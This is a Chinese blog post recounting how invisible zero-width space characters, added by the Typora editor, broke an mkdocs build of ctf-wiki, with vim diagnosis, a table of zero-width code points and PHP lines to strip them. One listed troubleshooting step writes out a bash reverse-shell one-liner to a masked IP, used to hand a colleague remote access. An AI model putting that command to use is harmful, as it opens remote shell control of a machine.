【记一次pull request的惨痛教训】不可见的分隔符之Zero-with-space

问题描述:

我在修改 ctf-wiki 目录后进行 mkdocs build 去生成索引目录的时候报错:

mkdocs-build-and-serve

然后我尝试定位到第 2 行和第 288 行,这些行我似乎并没有修改过啊。

未果,开始去找师傅解决。

解决方案探索:

由于我不太懂 mkdocs 的运行机制,这个时候肯定是需要找刘师傅了。

方案一、 mkdocsclean 缓存。

似乎这个想法是行不通了,不是根本原因。

方案二、改目录

我们开始猜想是不是路径中有中文的锅,改一下路径,未果。

方案三、反弹 shell

弄不出来了,我直接反弹一个 shell 给刘师傅。

bash -i>& /dev/tcp/xxx.xxx.xxx.xxx/xxx 0>&1

似乎师傅觉得权限太小了,然后不让弄了23333,未果。

方案四、重新clone一遍

一般出现问题,从头来一遍就好了,然后我这么做了,重新改了一下索引,未果。

方案五、 git diff 定位源码

使用 git diff 看哪部分代码修改过了,发现了一些问题,明明两段代码一模一样的,却显示有被修改过的痕迹。

探索:

既然有点眉头了,我们开始猜测是不是 tab 和空格混淆了,但是我并没有修改过,几番猜测后可能是我的编辑器存在问题,我用 Typora 修改的目录,可能是因为编辑器的问题,自动加上了一些奇怪的东西进去。

开始尝试:

vim 去查看下目录文件,事情果然不简单:

zero-with-space

这个 <200b> 是什么鬼东西,删掉再本地跑一下试试看先,果真是这个特殊字符的锅。

特意去维基百科上查阅了文档,发现这个学术名词叫 Zero-width-space(零宽空格) ,是一种不可打印的 Unicode 字符,用于可能需要换行处。

简单理解,什么是零宽度空格?它是一个Unicode字符,它是一个空格,它没有宽度!

什么叫没有宽度?就是如果 2 个字母之间打了一个零宽度空格,你是看不见任何东西的,两个字母还是会挨在一起。而且更坑爹的是,就算你用的是等宽字体,它也看不见。

这种字符在高级编辑器中都是看不见这个符号的,只有 VIM 这种古老的编辑器才能看到。

有关这种特殊字元存在以下三种形式:

Unicode code point character UTF-8 (in literal) name
U+200B \xe2\x80\x8b ZERO WIDTH SPACE
U+200C \xe2\x80\x8c ZERO WIDTH NON-JOINER
U+200D \xe2\x80\x8d ZERO WIDTH JOINER

我们在写入文件中应该用以下语法去过滤这三种字符:

// remove zero width space
$value = str_replace("\xe2\x80\x8b", '', $value);
$value = str_replace("\xe2\x80\x8c", '', $value);
$value = str_replace("\xe2\x80\x8d", '', $value);

扩展:

posted @   Angel_Kitty  阅读(847)  评论(0编辑  收藏  举报
编辑推荐:
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
阅读排行:
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 分享 3 个 .NET 开源的文件压缩处理库,助力快速实现文件压缩解压功能!
· Ollama——大语言模型本地部署的极速利器
· [AI/GPT/综述] AI Agent的设计模式综述
点击右上角即可分享
微信分享提示
哥伦布
14°
14:09发布
哥伦布
14:09发布
14°
大雨
南风
3级
空气质量
相对湿度
93%
今天
中雨
14°/19°
周日
中雨
5°/19°
周一
1°/11°